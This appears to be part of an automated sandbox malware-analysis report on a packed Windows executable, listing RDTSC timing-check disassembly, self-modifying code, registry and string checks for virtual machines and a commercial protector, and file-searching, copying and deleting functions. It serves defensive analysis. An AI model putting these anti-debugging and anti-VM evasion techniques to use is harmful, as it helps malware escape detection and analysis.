                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B4059 second address: 11B407D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 jmp 00007FC83CB776AEh 0x0000000e pop eax 0x0000000f jmp 00007FC83CB776ACh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B407D second address: 11B4091 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC83CB64D3Eh 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B4091 second address: 11B40A3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC83CB776A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007FC83CB776AEh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BE6B5 second address: 11BE6D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FC83CB64D46h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C980E second address: 11C9812 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C9812 second address: 11C983C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC83CB64D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jmp 00007FC83CB64D47h 0x00000010 push eax 0x00000011 push edx 0x00000012 jnl 00007FC83CB64D36h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CF47D second address: 11CF4B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007FC83CB776CCh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CF4B4 second address: 11CF4D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC83CB64D48h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D5ED6 second address: 11D5EF1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83CB776B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D5EF1 second address: 11D5EF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D5EF7 second address: 11D5F04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007FC83CB776A8h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D5F04 second address: 11D5F0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FC83CB64D36h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DD7B5 second address: 11DD7B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DD7B9 second address: 11DD7F5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC83CB64D43h 0x0000000b push eax 0x0000000c jmp 00007FC83CB64D44h 0x00000011 pop eax 0x00000012 pushad 0x00000013 jmp 00007FC83CB64D3Ah 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DD7F5 second address: 11DD7FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DD62D second address: 11DD645 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 jmp 00007FC83CB64D41h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DD645 second address: 11DD65F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC83CB776B6h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DEEA3 second address: 11DEED2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83CB64D3Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC83CB64D44h 0x00000010 jnc 00007FC83CB64D36h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E5759 second address: 11E575D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E575D second address: 11E5761 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E5E72 second address: 11E5E76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E5E76 second address: 11E5E7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E5FE2 second address: 11E5FE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E5FE6 second address: 11E6005 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83CB64D3Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jo 00007FC83CB64D36h 0x00000010 jng 00007FC83CB64D36h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E6005 second address: 11E6034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC83CB776B3h 0x0000000f jmp 00007FC83CB776B2h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E6034 second address: 11E6038 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E6A0D second address: 11E6A11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E6A11 second address: 11E6A17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E6A17 second address: 11E6A25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007FC83CB776A6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EA276 second address: 11EA294 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FC83CB64D36h 0x0000000a jmp 00007FC83CB64D44h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EA294 second address: 11EA2AB instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC83CB776A6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jbe 00007FC83CB776C8h 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EA2AB second address: 11EA2B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EA2B4 second address: 11EA2BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FC83CB776A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F8D89 second address: 11F8DA2 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC83CB64D36h 0x00000008 jns 00007FC83CB64D36h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edi 0x00000011 jp 00007FC83CB64D36h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F479F second address: 11F47A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F47A3 second address: 11F47B5 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC83CB64D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007FC83CB64D36h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1216740 second address: 121674F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FC83CB776A6h 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121674F second address: 1216755 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1216755 second address: 1216761 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC83CB776A6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1216761 second address: 1216775 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83CB64D3Fh 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1215841 second address: 121584B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FC83CB776A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121584B second address: 1215855 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC83CB64D36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1215855 second address: 121586D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC83CB776B2h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121586D second address: 1215893 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC83CB64D42h 0x00000009 jmp 00007FC83CB64D40h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12159D5 second address: 12159D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12159D9 second address: 12159DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1215B2B second address: 1215B5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 js 00007FC83CB776A6h 0x0000000b jmp 00007FC83CB776B4h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push edx 0x00000014 jng 00007FC83CB776A8h 0x0000001a pushad 0x0000001b popad 0x0000001c pushad 0x0000001d push edx 0x0000001e pop edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1215DFB second address: 1215DFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12160AC second address: 12160B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FC83CB776A6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12160B7 second address: 12160C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12163BB second address: 12163C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12163C1 second address: 12163C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12163C5 second address: 12163E8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC83CB776A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jmp 00007FC83CB776B1h 0x00000010 jng 00007FC83CB776A6h 0x00000016 pop ebx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12163E8 second address: 12163EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12163EE second address: 1216407 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83CB776B5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1216407 second address: 121643E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC83CB64D45h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC83CB64D45h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121643E second address: 1216442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1216442 second address: 121644E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121644E second address: 1216452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1216452 second address: 121645B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12191B0 second address: 12191B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1219422 second address: 1219439 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83CB64D43h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1219439 second address: 1219453 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC83CB776ACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b je 00007FC83CB776AEh 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12197BA second address: 12197FF instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC83CB64D38h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jmp 00007FC83CB64D42h 0x00000014 jmp 00007FC83CB64D3Ch 0x00000019 popad 0x0000001a pushad 0x0000001b jmp 00007FC83CB64D44h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12197FF second address: 1219847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 push dword ptr [ebp+122D1B2Fh] 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007FC83CB776A8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 push ecx 0x00000028 mov dl, 08h 0x0000002a pop edx 0x0000002b jmp 00007FC83CB776ADh 0x00000030 call 00007FC83CB776A9h 0x00000035 push edi 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1219847 second address: 121985A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c jns 00007FC83CB64D36h 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121985A second address: 1219865 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FC83CB776A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1219865 second address: 1219874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1219874 second address: 12198AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC83CB776B7h 0x00000009 popad 0x0000000a jmp 00007FC83CB776B5h 0x0000000f popad 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12198AE second address: 12198B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12198B4 second address: 12198DA instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC83CB776B4h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jl 00007FC83CB776A8h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121AB69 second address: 121AB6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121AB6D second address: 121AB71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121C387 second address: 121C3A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC83CB64D49h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA02B6 second address: 4DA032C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FC83CB776AAh 0x00000009 pop esi 0x0000000a popad 0x0000000b mov esi, edx 0x0000000d popad 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FC83CB776B8h 0x00000016 xor ecx, 6C0E6DC8h 0x0000001c jmp 00007FC83CB776ABh 0x00000021 popfd 0x00000022 mov ebx, esi 0x00000024 popad 0x00000025 mov dword ptr [esp], ebp 0x00000028 jmp 00007FC83CB776B2h 0x0000002d mov ebp, esp 0x0000002f jmp 00007FC83CB776B0h 0x00000034 pop ebp 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 mov edi, 1B0E1570h 0x0000003d mov dh, 18h 0x0000003f popad 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1147BE5 second address: 1147BEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: F91BFE instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 1134A78 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: F91B22 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 1143AA1 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 11C37E2 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D438B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00D438B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D44910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00D44910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00D3DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00D3E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D44570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00D44570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00D3ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D316D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00D316D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3F68A FindFirstFileA,0_2_00D3F68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00D3F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D43EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00D43EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00D3BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00D3DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D31160 GetSystemInfo,ExitProcess,0_2_00D31160
                Source: file.exe, file.exe, 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2120585250.0000000000902000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2120585250.0000000000934000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2120585250.0000000000918000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2120585250.00000000008BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13443
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13392
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13389
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13403
